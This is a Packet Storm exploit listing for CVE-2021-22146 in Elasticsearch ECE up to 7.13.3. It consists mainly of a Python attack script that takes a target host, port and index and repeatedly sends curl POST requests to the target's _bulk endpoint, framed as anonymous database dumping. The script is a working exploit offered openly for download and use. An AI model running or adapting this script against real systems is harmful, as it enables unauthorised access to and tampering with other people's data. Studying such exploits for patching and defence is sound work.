exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Elasticsearch ECE 7.13.3 Database Disclosure

Elasticsearch ECE 7.13.3 Database Disclosure
Posted Jul 26, 2021
Authored by Joan Martinez

Elasticsearch ECE version 7.13.3 anonymous database dumping exploit.

tags | exploit, info disclosure
advisories | CVE-2021-22146
SHA-256 | fca9927fbaec3c0c7e66a7316f382e0c4a0a308b7deb63b9e0b0e30c13e6579d
Download | Favorite | View

Elasticsearch ECE 7.13.3 Database Disclosure

Change Mirror Download
# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump
# Date: 2021-07-21
# Exploit Author: Joan Martinez @magichk
# Vendor Homepage: https://www.elastic.co/
# Software Link: https://www.elastic.co/
# Version: >= 7.10.0 to <= 7.13.3
# Tested on: Elastic ECE (Cloud)
# CVE : CVE-2021-22146
# Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180 

import os
import argparse
import sys

######### Check Arguments
def checkArgs():
  parser = argparse.ArgumentParser()
  parser = argparse.ArgumentParser(description='Elasticdump 1.0\n')
  parser.add_argument('-s', "--host", action="store",
            dest='host',
                      help="Host to attack.")
  parser.add_argument('-p', "--port", action="store",
            dest='port',
                      help="Elastic search port by default 9200 or 9201")
  parser.add_argument('-i', "--index", action="store",
            dest='index',
                      help="Index to dump (Example: 30)")


  args = parser.parse_args()
  if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) :
    parser.print_help(sys.stderr)
    sys.exit(1)
  return args

def banner():
    print("      _           _   _         _")
    print("  ___| | __ _ ___| |_(_) ___ __| |_   _ _ __ ___  _ __")
    print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ")
    print("|  __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |")
    print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/")
    print("                                                 |_|")



def exploit(host,port,index):

  if (index != 0):
      final = int(index)
  else:
      final = 1000000000

  cont = 0
  while (cont <= final):
    os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\"  :  {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s")
    cont = cont + 1

if __name__ == "__main__":

  banner()
  args = checkArgs()
  if (args.index):
      exploit(args.host,args.port,args.index)
  else:
      exploit(args.host,args.port,0)
Login or Register to add favorites

File Archive:

November 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    1 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    0 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    219 Files
  • 14
    Nov 14th
    19 Files
  • 15
    Nov 15th
    66 Files
  • 16
    Nov 16th
    38 Files
  • 17
    Nov 17th
    9 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    11 Files
  • 22
    Nov 22nd
    56 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    36 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    14 Files
  • 28
    Nov 28th
    30 Files
  • 29
    Nov 29th
    35 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close